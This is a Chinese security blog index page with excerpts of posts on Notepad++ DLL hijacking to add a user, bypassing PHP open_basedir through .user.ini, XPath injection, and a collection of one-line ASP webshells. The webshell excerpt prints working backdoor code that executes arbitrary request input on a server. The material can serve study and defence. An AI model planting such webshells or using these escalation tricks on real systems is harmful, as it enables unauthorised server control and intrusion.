Notepad++劫持提权

时间:2017-2-22   作者:webbaozi   分类: 奇技淫巧   热度:95°    
时间:2017-2-22   分类: 奇技淫巧    热度:95  
之前看到k8博客有个notepad++的劫持提权。仅仅只是一个弹框操作(检测劫持是否存在。) 自己动手,丰衣足食。 效果图如下: xp: 使用前 替换了dll文件后 运行notepad++,再查看用户,可以知道已经添加了用户 win10:(因为是添加用户,win10需要以管理员身份运行notepad++): 使用前: 以管理员身份运行notepad++后: 用户名:webbaozi 用...

阅读全文>>

LNMP虚拟主机PHP沙盒逃逸

时间:2017-2-18   作者:webbaozi   分类: 奇技淫巧   热度:50°    
时间:2017-2-18   分类: 奇技淫巧    热度:50  
并不只是针对Lnmp的沙盒逃逸,而是.user.ini的设计缺陷达到绕过open_basedir限制,所以是通用的方法。首先来看看最新版LNMP是怎么配置open_basedir的: open_basedir=/home/wwwroot/default:/tmp/:/proc/ lsattr .user.ini ----i----------- .user.ini LNMP的open_basedir是通过.user.ini来配置的。再来看disable_functions都禁用了哪些函数: lnmp1.3/in...

阅读全文>>

XPath注入详解

时间:2017-2-15   作者:webbaozi   分类: 奇技淫巧   热度:71°    
时间:2017-2-15   分类: 奇技淫巧    热度:71  
0x01 简介 XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据。攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的,从而进一步获取正常途径下无法获取的数据。当XML数据被用作账户验证时,攻击者还可以提升他的权限。 0x02 原理 XPath 注入的原理与sql注入大体类似。主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作...

阅读全文>>

【收集】一句话脚本

时间:2017-2-12   作者:webbaozi   分类: 个人笔记   热度:69°    
时间:2017-2-12   分类: 个人笔记    热度:69  
只是收集,并没有逐个测试可用性,请自行测试,谢谢:)! asp一句话  <%execute(request("webbaozi"))%> <%eval request("webbaozi")%> <%eval(Request.Item["webbaozi"],"unsafe");%> <SCRIPT language=VBScript runat="server">execute request("webbaozi")</SCRIPT> <% Function...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1    
00:00 / 00:00
随机播放